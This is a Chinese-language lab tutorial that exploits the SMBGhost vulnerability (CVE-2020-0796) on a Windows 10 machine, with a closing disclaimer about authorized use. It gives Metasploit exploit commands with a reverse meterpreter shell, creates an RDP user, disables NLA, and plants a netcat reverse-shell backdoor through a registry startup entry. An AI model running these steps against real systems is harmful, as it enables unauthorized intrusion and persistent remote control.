以下是利用永恒之黑漏洞对Windows 10进行渗透测试的步骤:

环境介绍

  • 靶机:IP地址为192.168.1.60,运行Windows 10 1903版本。
  • 攻击机:IP地址为192.168.1.53

靶机准备

  1. 检查Windows 10版本号:确保靶机运行的Windows 10版本受到永恒之黑漏洞(CVE-2020-0796 SMBGhost)的影响。
  2. 检查系统补丁:确认靶机未安装补丁KB4551762,该补丁修复了永恒之黑漏洞。
  3. 开启445端口:确保靶机的445端口(SMB协议)是开放的。

获取Shell

  1. 使用Metasploit框架

    • 启动Metasploit:msfconsole
    • 使用永恒之黑漏洞模块:use exploit/windows/smb/cve_2020_0796_smbghost
  2. 设置选项

    • 显示模块选项:show options
    • 设置目标主机IP:set RHOSTS 192.168.1.60
    • 设置payload:set payload windows/x64/meterpreter/reverse_tcp
    • 设置攻击机监听IP:set LHOST 192.168.1.53
    • 禁用模拟模式:set DefangedMode false
  3. 执行exploit

    • 运行exploit:exploit

创建新用户并开启远程桌面

  1. 开启RDP远程桌面

    • 使用Metasploit的post/windows/manage/enable_rdp模块开启RDP服务,并创建新用户。
  2. 创建RDP用户

    • 设置用户名和密码:set username xuegodset password 123456
    • 指定会话ID:set session 1
    • 运行模块:run
  3. 检查NLA设置

    • 查询注册表以确定是否开启网络级身份验证(NLA)。
  4. 关闭NLA(如果开启):

    • 修改注册表值SecurityLayerUserAuthentication为0,以允许非NLA的RDP连接。
  5. 连接远程桌面

    • 在Kali上使用rdesktop命令连接到靶机的远程桌面:rdesktop 192.168.1.60

开启后门维持权限访问

  1. 配置后门程序

    • 上传nc(Netcat)到Windows 10系统。
    • 修改注册表添加启动项,以便在系统启动时执行nc反弹shell命令。
  2. 设置防火墙规则

    • 允许443端口的网络访问,以使后门有效。
  3. 重启Windows 10

    • 重启靶机以应用更改,并等待后门程序运行。
  4. 连接后门

    • 在Kali上使用nc命令连接后门:nc -v 192.168.1.60 443
  5. MSF控制台连接(可选):

    • 在Metasploit框架中使用connect命令连接到后门:connect 192.168.1.60 443

总结

  • 文档提供了利用永恒之黑漏洞对Windows 10进行渗透的详细步骤,包括获取初始访问、创建远程桌面用户、开启后门以及维持权限访问。

请注意,这些步骤仅供教育目的,实际操作应在授权的渗透测试和安全研究环境中进行。未经授权的渗透测试可能违反法律。

05-24 14:23